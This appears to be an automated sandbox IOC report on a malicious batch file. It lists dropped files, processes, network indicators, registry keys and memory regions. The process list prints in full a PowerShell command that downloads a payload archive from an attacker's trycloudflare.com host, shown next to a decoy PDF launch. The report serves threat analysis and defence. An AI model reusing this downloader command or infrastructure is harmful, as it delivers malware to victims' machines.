IOC Report
__5A1AACAD-4F60-4DC8-94AA-4866010B7794_.bat

loading gif

Files

File Path
Type
Category
Malicious
__5A1AACAD-4F60-4DC8-94AA-4866010B7794_.bat
Unicode text, UTF-8 text, with very long lines (1438), with CRLF line terminators
initial sample
malicious
C:\Users\user\Downloads\toto.zip
Zip archive data, at least v2.0 to extract, compression method=store
modified
malicious
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\94afc737-04dd-4927-a105-35c9c220d018.tmp
JSON data
modified
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
JSON data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Certificate, Version=3
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
modified
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.6256
PostScript document text
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)
PostScript document text
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
SQLite Rollback Journal
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\MSIe3faf.LOG
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_15wfupuq.nzp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4dapngs1.jvo.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_brouqlje.ghs.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_quwxdlf1.bpl.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-10-25 13-50-21-147.log
ASCII text, with very long lines (393)
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
ASCII text, with very long lines (393), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\3cbc38a8-0d23-4ccd-af57-d042de07433d.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1647188
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\4a1b048d-f4e0-4c24-866c-997655eaf784.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\b9ae2720-a692-4925-a7ea-946b80190635.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\e99d25c5-bd96-4214-96ea-b6bff979bbcd.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
dropped
\Device\Null
ASCII text, with CRLF line terminators, with overstriking
dropped
There are 42 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\__5A1AACAD-4F60-4DC8-94AA-4866010B7794_.bat" "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://retailer-indicators-resume-key.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://retailer-indicators-resume-key.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\DUUDTUBZFW.pdf"
C:\Windows\System32\timeout.exe
timeout /t 5
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1524,i,13191732678988817779,5273796738315577803,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8

URLs

Name
IP
Malicious
https://retailer-indicators-resume-key.trycloudflare.com/toto.zip
104.16.230.132
malicious
https://retailer-indicators-resume-key.trycloudfla
unknown
malicious
https://retailer-indicators-resume-key.trycloudflare.com
unknown
malicious
https://retailer-indicators-resume-key.trycloudflare.com/toto.zipW3
unknown
http://nuget.org/NuGet.exe
unknown
http://x1.i.lencr.org/
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://microft.com/pkt7
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://retailer-indicators-resume-key.trycloudflare.com/toto.zipb
unknown
https://aka.ms/pscore68
unknown
https://retailer-indicators-resume-key.trycloudflare.com/toto.zip?
unknown
https://retailer-indicators-resume-key.trycloudflare.com/toto.zip9
unknown
https://retailer-indicators-resume-key.trycloudflare.com/update.bat
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
http://retailer-indicators-resume-key.trycloudflare.com
unknown
https://retailer-indicators-resume-key.trycloudflare.com/toto.zip7
unknown
https://retailer-indicators-resume-key.trycloudflare.com/toto.zipeoy
unknown
There are 14 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
retailer-indicators-resume-key.trycloudflare.com
104.16.230.132
malicious
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
217.20.57.34
x1.i.lencr.org
unknown

IPs

IP
Domain
Country
Malicious
104.16.230.132
retailer-indicators-resume-key.trycloudflare.com
United States
malicious

Registry

Path
Value
Malicious
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 7 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1E42EB52000
trusted library allocation
page read and write
1E42F05F000
trusted library allocation
page read and write
965468F000
stack
page read and write
1E42F056000
trusted library allocation
page read and write
1E42E733000
trusted library allocation
page read and write
1E42F3CC000
trusted library allocation
page read and write
26C65010000
heap
page read and write
1E7F4C7F000
heap
page read and write
1E42E179000
trusted library allocation
page read and write
1E7DE3DE000
trusted library allocation
page read and write
1E7DE3DB000
trusted library allocation
page read and write
1E42D652000
trusted library allocation
page read and write
1E42DFCA000
trusted library allocation
page read and write
1E42DE7E000
trusted library allocation
page read and write
1E42E22F000
trusted library allocation
page read and write
1E42EE98000
trusted library allocation
page read and write
1E42DE66000
trusted library allocation
page read and write
1E42F014000
trusted library allocation
page read and write
1E7DE012000
trusted library allocation
page read and write
1E445354000
heap
page read and write
7FF83C760000
trusted library allocation
page read and write
1E7DE575000
trusted library allocation
page read and write
96535FD000
stack
page read and write
1E7DDFFA000
trusted library allocation
page read and write
1E42F3AB000
trusted library allocation
page read and write
1E42E715000
trusted library allocation
page read and write
1E7F4A6F000
heap
page read and write
1E42ED1C000
trusted library allocation
page read and write
675E5BE000
stack
page read and write
1E7DDBAE000
trusted library allocation
page read and write
1E42E587000
trusted library allocation
page read and write
1E42E572000
trusted library allocation
page read and write
1E7DD31C000
trusted library allocation
page read and write
1E7DDA89000
trusted library allocation
page read and write
1E7DDA83000
trusted library allocation
page read and write
1E7DE1FC000
trusted library allocation
page read and write
1E42DE57000
trusted library allocation
page read and write
7FF83C4D0000
trusted library allocation
page read and write
1E42D65D000
trusted library allocation
page read and write
1E7DE1F9000
trusted library allocation
page read and write
7FF83C6B0000
trusted library allocation
page execute and read and write
1E7DE208000
trusted library allocation
page read and write
1E42E009000
trusted library allocation
page read and write
1E7DE217000
trusted library allocation
page read and write
1E42E238000
trusted library allocation
page read and write
1E42DFD0000
trusted library allocation
page read and write
1E42E015000
trusted library allocation
page read and write
1E7DD985000
trusted library allocation
page read and write
1E42B3AB000
heap
page read and write
1E42DE15000
trusted library allocation
page read and write
1E7DCC18000
trusted library allocation
page read and write
1E42B566000
heap
page read and write
1E42E3CF000
trusted library allocation
page read and write
7FF83C57C000
trusted library allocation
page execute and read and write
7FF83C790000
trusted library allocation
page read and write
1E42E411000
trusted library allocation
page read and write
7FF83C810000
trusted library allocation
page read and write
1E42EE71000
trusted library allocation
page read and write
1E42E721000
trusted library allocation
page read and write
1E42F071000
trusted library allocation
page read and write
1E42ED01000
trusted library allocation
page read and write
1E7DE1FF000
trusted library allocation
page read and write
1E42DFE2000
trusted library allocation
page read and write
1E42F017000
trusted library allocation
page read and write
1E7DC574000
heap
page read and write
1E42B4D0000
trusted library allocation
page read and write
1E42E781000
trusted library allocation
page read and write
1E42F032000
trusted library allocation
page read and write
1E42EEBC000
trusted library allocation
page read and write
1E7DDBB4000
trusted library allocation
page read and write
1E7DD8EC000
trusted library allocation
page read and write
1E42E760000
trusted library allocation
page read and write
1E7DAA0B000
heap
page read and write
1E7DD979000
trusted library allocation
page read and write
1E42E976000
trusted library allocation
page read and write
1E42EECB000
trusted library allocation
page read and write
1E42B30F000
heap
page read and write
1E7DDDDD000
trusted library allocation
page read and write
1E42EE9E000
trusted library allocation
page read and write
1E44538D000
heap
page read and write
1E42EE65000
trusted library allocation
page read and write
1E42ECF8000
trusted library allocation
page read and write
1E42F068000
trusted library allocation
page read and write
1E42F3F6000
trusted library allocation
page read and write
1E42EB1F000
trusted library allocation
page read and write
1E42DC99000
trusted library allocation
page read and write
1E42F04A000
trusted library allocation
page read and write
1E7DABC0000
trusted library allocation
page read and write
1E7DE55D000
trusted library allocation
page read and write
1E42E751000
trusted library allocation
page read and write
1E42EB07000
trusted library allocation
page read and write
7FF83C6AA000
trusted library allocation
page read and write
1E7DC8C1000
trusted library allocation
page read and write
1E7DDBA2000
trusted library allocation
page read and write
1E42EB73000
trusted library allocation
page read and write
1E42DC63000
trusted library allocation
page read and write
1E42EB5E000
trusted library allocation
page read and write
1E42ED04000
trusted library allocation
page read and write
1E42E952000
trusted library allocation
page read and write
1E42ECB9000
trusted library allocation
page read and write
675F08E000
stack
page read and write
1E445570000
heap
page read and write
1E44534A000
heap
page read and write
1E42EEB6000
trusted library allocation
page read and write
1E42E1F9000
trusted library allocation
page read and write
1E42EB25000
trusted library allocation
page read and write
1E7DE59F000
trusted library allocation
page read and write
1E42DCC3000
trusted library allocation
page read and write
1E7DA9CB000
heap
page read and write
1E42EE74000
trusted library allocation
page read and write
1E7DDA98000
trusted library allocation
page read and write
1E42E265000
trusted library allocation
page read and write
1E7DE22C000
trusted library allocation
page read and write
1E42E241000
trusted library allocation
page read and write
1E42DFE5000
trusted library allocation
page read and write
1E42E3E1000
trusted library allocation
page read and write
1E42DFD3000
trusted library allocation
page read and write
1E7DCC0A000
trusted library allocation
page read and write
1E42E268000
trusted library allocation
page read and write
1E42E5A2000
trusted library allocation
page read and write
7FF83C6B0000
trusted library allocation
page execute and read and write
1E7DDFFD000
trusted library allocation
page read and write
7FF83C6C0000
trusted library allocation
page execute and read and write
1E42EB3D000
trusted library allocation
page read and write
1E42ECBF000
trusted library allocation
page read and write
7FF83C680000
trusted library allocation
page execute and read and write
1E7DE578000
trusted library allocation
page read and write
C09E6CC000
stack
page read and write
1E7DC3F0000
trusted library allocation
page read and write
1E7DD5BC000
trusted library allocation
page read and write
1E7DE104000
trusted library allocation
page read and write
1E7DD964000
trusted library allocation
page read and write
7FF83C4F3000
trusted library allocation
page execute and read and write
1E42E74B000
trusted library allocation
page read and write
1E7DE211000
trusted library allocation
page read and write
1E7DE000000
trusted library allocation
page read and write
1E42F08C000
trusted library allocation
page read and write
1E42E99A000
trusted library allocation
page read and write
1E42F3BA000
trusted library allocation
page read and write
965377E000
stack
page read and write
1E42ECCE000
trusted library allocation
page read and write
1E7DDCAC000
trusted library allocation
page read and write
1E7DE3ED000
trusted library allocation
page read and write
1E42EED4000
trusted library allocation
page read and write
1E7DE128000
trusted library allocation
page read and write
1E42F089000
trusted library allocation
page read and write
7FF83C6C0000
trusted library allocation
page read and write
1E42E3C3000
trusted library allocation
page read and write
1E42EED1000
trusted library allocation
page read and write
7FF83C710000
trusted library allocation
page read and write
1E42DCBD000
trusted library allocation
page read and write
1E7DC4F6000
heap
page execute and read and write
1E42E994000
trusted library allocation
page read and write
1E43D319000
trusted library allocation
page read and write
1E42F038000
trusted library allocation
page read and write
7FF83C7D0000
trusted library allocation
page read and write
1E7DD6BA000
trusted library allocation
page read and write
1E7DE0F5000
trusted library allocation
page read and write
7FF83C690000
trusted library allocation
page execute and read and write
1E7DE214000
trusted library allocation
page read and write
1E42D290000
heap
page read and write
1E42DE72000
trusted library allocation
page read and write
1E42E5D2000
trusted library allocation
page read and write
1E42F3F3000
trusted library allocation
page read and write
1E42E72A000
trusted library allocation
page read and write
7FF83C830000
trusted library allocation
page read and write
1E42E76F000
trusted library allocation
page read and write
1E7DE58D000
trusted library allocation
page read and write
1E42ECEC000
trusted library allocation
page read and write
7FF83C5B0000
trusted library allocation
page execute and read and write
7FF83C50B000
trusted library allocation
page read and write
1E42ECD7000
trusted library allocation
page read and write
1E7DDA92000
trusted library allocation
page read and write
1E7DD970000
trusted library allocation
page read and write
1E42F22F000
trusted library allocation
page read and write
1E7DE116000
trusted library allocation
page read and write
1E42B4F0000
trusted library allocation
page read and write
1E7DE0F8000
trusted library allocation
page read and write
1E42F047000
trusted library allocation
page read and write
1E42F39F000
trusted library allocation
page read and write
1E42ECFB000
trusted library allocation
page read and write
7FF83C780000
trusted library allocation
page read and write
1E7DD6C6000
trusted library allocation
page read and write
1E7DE39F000
trusted library allocation
page read and write
1E42F05C000
trusted library allocation
page read and write
1E42ED22000
trusted library allocation
page read and write
1E42EE7A000
trusted library allocation
page read and write
1E7F4BD0000
heap
page execute and read and write
1E42EB6A000
trusted library allocation
page read and write
1E7DE3D5000
trusted library allocation
page read and write
1E42E593000
trusted library allocation
page read and write
1E42F244000
trusted library allocation
page read and write
1E42B33B000
heap
page read and write
1E42E20E000
trusted library allocation
page read and write
1E7DAB50000
heap
page read and write
1E7DDDC5000
trusted library allocation
page read and write
1E7DDEB7000
trusted library allocation
page read and write
1E42F381000
trusted library allocation
page read and write
1E42DFD9000
trusted library allocation
page read and write
1E7DDEF9000
trusted library allocation
page read and write
1E42E754000
trusted library allocation
page read and write
1E7DDCD0000
trusted library allocation
page read and write
1E42F026000
trusted library allocation
page read and write
1E7DE3BD000
trusted library allocation
page read and write
1E42DFFD000
trusted library allocation
page read and write
1E42DCB7000
trusted library allocation
page read and write
1E42DE75000
trusted library allocation
page read and write
1E42F02F000
trusted library allocation
page read and write
1E42F21A000
trusted library allocation
page read and write
1E42DCAB000
trusted library allocation
page read and write
1E42E02D000
trusted library allocation
page read and write
1E4452D7000
heap
page read and write
1E7F49D0000
heap
page read and write
1E43D2B0000
trusted library allocation
page read and write
1E42E75A000
trusted library allocation
page read and write
1E42E003000
trusted library allocation
page read and write
1E42F3A8000
trusted library allocation
page read and write
1E7DAA06000
heap
page read and write
1E7DA9BF000
heap
page read and write
1E42E730000
trusted library allocation
page read and write
7FF83C6E0000
trusted library allocation
page read and write
1E4455BA000
heap
page read and write
1E445391000
heap
page read and write
1E42EE6B000
trusted library allocation
page read and write
1E42E3F0000
trusted library allocation
page read and write
1E7DDFD9000
trusted library allocation
page read and write
1E42E5BA000
trusted library allocation
page read and write
1E7DDCCD000
trusted library allocation
page read and write
1E42E772000
trusted library allocation
page read and write
1E42E9A3000
trusted library allocation
page read and write
1E42E40E000
trusted library allocation
page read and write
1E7DDEEA000
trusted library allocation
page read and write
1E42F1F9000
trusted library allocation
page read and write
1E7DD32E000
trusted library allocation
page read and write
1E7DE23B000
trusted library allocation
page read and write
7FF83C6A1000
trusted library allocation
page read and write
1E42E3B7000
trusted library allocation
page read and write
1E42E5A5000
trusted library allocation
page read and write
675E0FF000
stack
page read and write
1E42DFDF000
trusted library allocation
page read and write
1E7DA930000
heap
page read and write
1E7F4C3F000
heap
page read and write
1E42E033000
trusted library allocation
page read and write
1E42ECF5000
trusted library allocation
page read and write
1E42E9A0000
trusted library allocation
page read and write
1E7DE22F000
trusted library allocation
page read and write
1E7DD5B3000
trusted library allocation
page read and write
1E7DE587000
trusted library allocation
page read and write
1E7DE11C000
trusted library allocation
page read and write
675E27E000
stack
page read and write
1E42ECE0000
trusted library allocation
page read and write
1E42E56F000
trusted library allocation
page read and write
1E42ECE9000
trusted library allocation
page read and write
1E42EB49000
trusted library allocation
page read and write
1E42E3F9000
trusted library allocation
page read and write
1E42F211000
trusted library allocation
page read and write
1E7DDFEB000
trusted library allocation
page read and write
1E42E1FC000
trusted library allocation
page read and write
1E42E23B000
trusted library allocation
page read and write
1E42B480000
heap
page read and write
1E7DDED5000
trusted library allocation
page read and write
1E7DDFE8000
trusted library allocation
page read and write
1E42E5A8000
trusted library allocation
page read and write
1E42E9AF000
trusted library allocation
page read and write
1E7DDFDF000
trusted library allocation
page read and write
1E7DDAA7000
trusted library allocation
page read and write
1E42E253000
trusted library allocation
page read and write
1E42F226000
trusted library allocation
page read and write
1E42DCD5000
trusted library allocation
page read and write
1E42ECDD000
trusted library allocation
page read and write
96534FE000
stack
page read and write
1E42F3E1000
trusted library allocation
page read and write
1E42F062000
trusted library allocation
page read and write
1E7DE569000
trusted library allocation
page read and write
1E42F065000
trusted library allocation
page read and write
1E7DDEB4000
trusted library allocation
page read and write
1E42F20E000
trusted library allocation
page read and write
1E7F4FD0000
heap
page read and write
1E42E718000
trusted library allocation
page read and write
1E42E20B000
trusted library allocation
page read and write
1E7DE3B1000
trusted library allocation
page read and write
1E42DE39000
trusted library allocation
page read and write
1E7DDDE0000
trusted library allocation
page read and write
1E7DE3BA000
trusted library allocation
page read and write
1E42F208000
trusted library allocation
page read and write
1E7DCAF1000
trusted library allocation
page read and write
1E42EB55000
trusted library allocation
page read and write
1E42E3AE000
trusted library allocation
page read and write
1E7DDDE3000
trusted library allocation
page read and write
1E7DAB70000
trusted library section
page read and write
1E42B336000
heap
page read and write
675DF3F000
stack
page read and write
1E42E3F6000
trusted library allocation
page read and write
1E42F3B4000
trusted library allocation
page read and write
1E42F083000
trusted library allocation
page read and write
1E7DE0E6000
trusted library allocation
page read and write
1E42F23E000
trusted library allocation
page read and write
1E42E5D8000
trusted library allocation
page read and write
1E7DDEC0000
trusted library allocation
page read and write
1E7DE11F000
trusted library allocation
page read and write
1E7DABE4000
heap
page read and write
1E7DE581000
trusted library allocation
page read and write
1E42E76C000
trusted library allocation
page read and write
1E7DDEBA000
trusted library allocation
page read and write
1E7DE122000
trusted library allocation
page read and write
1E42EB43000
trusted library allocation
page read and write
26C65015000
heap
page read and write
7FF83C760000
trusted library allocation
page read and write
965357E000
stack
page read and write
1E42F3D2000
trusted library allocation
page read and write
1E42E247000
trusted library allocation
page read and write
1E42DC81000
trusted library allocation
page read and write
1E7DE54E000
trusted library allocation
page read and write
1E7DE0E0000
trusted library allocation
page read and write
1E42F390000
trusted library allocation
page read and write
1E7DD4BE000
trusted library allocation
page read and write
1E42E71E000
trusted library allocation
page read and write
1E7DE110000
trusted library allocation
page read and write
1E42EB22000
trusted library allocation
page read and write
1E42DCB1000
trusted library allocation
page read and write
1E7DDCC1000
trusted library allocation
page read and write
1E42DE87000
trusted library allocation
page read and write
1E42E417000
trusted library allocation
page read and write
675F24D000
stack
page read and write
1E42E214000
trusted library allocation
page read and write
1E42E25F000
trusted library allocation
page read and write
1E42E727000
trusted library allocation
page read and write
1E42E3BA000
trusted library allocation
page read and write
1E7DE5A5000
trusted library allocation
page read and write
1E42EB4F000
trusted library allocation
page read and write
1E42E26B000
trusted library allocation
page read and write
1E42EE83000
trusted library allocation
page read and write
1E42EB70000
trusted library allocation
page read and write
1E42ECDA000
trusted library allocation
page read and write
1E7F4C66000
heap
page read and write
7FF83C7F0000
trusted library allocation
page read and write
1E42E9B8000
trusted library allocation
page read and write
1E42E018000
trusted library allocation
page read and write
7FF83C6A2000
trusted library allocation
page read and write
1E42F214000
trusted library allocation
page read and write
1E42EEC8000
trusted library allocation
page read and write
1E42E787000
trusted library allocation
page read and write
1E7DDEFC000
trusted library allocation
page read and write
1E42EEB9000
trusted library allocation
page read and write
1E42EB31000
trusted library allocation
page read and write
1E42DE24000
trusted library allocation
page read and write
1E42F1DE000
trusted library allocation
page read and write
1E42E973000
trusted library allocation
page read and write
1E42DE84000
trusted library allocation
page read and write
1E7DDDCB000
trusted library allocation
page read and write
1E7F4C3A000
heap
page read and write
1E7DDFD6000
trusted library allocation
page read and write
1E42DC69000
trusted library allocation
page read and write
1E7DDCB8000
trusted library allocation
page read and write
1E42ECC5000
trusted library allocation
page read and write
7FF83C730000
trusted library allocation
page read and write
1E42E946000
trusted library allocation
page read and write
1E42F235000
trusted library allocation
page read and write
1E42F03E000
trusted library allocation
page read and write
1E7F4A6B000
heap
page read and write
1E7DDCB2000
trusted library allocation
page read and write
1E42DC93000
trusted library allocation
page read and write
1E42E9B2000
trusted library allocation
page read and write
1E7DE235000
trusted library allocation
page read and write
1E7DABE0000
heap
page read and write
1E42F3BD000
trusted library allocation
page read and write
1E42ECC8000
trusted library allocation
page read and write
1E7DDDDA000
trusted library allocation
page read and write
1E42D2A1000
trusted library allocation
page read and write
1E42EB3A000
trusted library allocation
page read and write
1E42E5AE000
trusted library allocation
page read and write
1E42F1E4000
trusted library allocation
page read and write
1E42DFEE000
trusted library allocation
page read and write
C09E7CF000
stack
page read and write
1E42E232000
trusted library allocation
page read and write
1E42E9B5000
trusted library allocation
page read and write
1E7DDFF7000
trusted library allocation
page read and write
1E42F37E000
trusted library allocation
page read and write
1E42E560000
trusted library allocation
page read and write
7FF83C4DB000
trusted library allocation
page read and write
1E7DAA71000
heap
page read and write
1E7DDA8F000
trusted library allocation
page read and write
1E42DC75000
trusted library allocation
page read and write
1E42F07D000
trusted library allocation
page read and write
1E42F1E7000
trusted library allocation
page read and write
1E42F3C3000
trusted library allocation
page read and write
1E42ECE3000
trusted library allocation
page read and write
7FF83C7A0000
trusted library allocation
page read and write
7FF83C840000
trusted library allocation
page read and write
1E42DFDC000
trusted library allocation
page read and write
1E42E405000
trusted library allocation
page read and write
1E42F023000
trusted library allocation
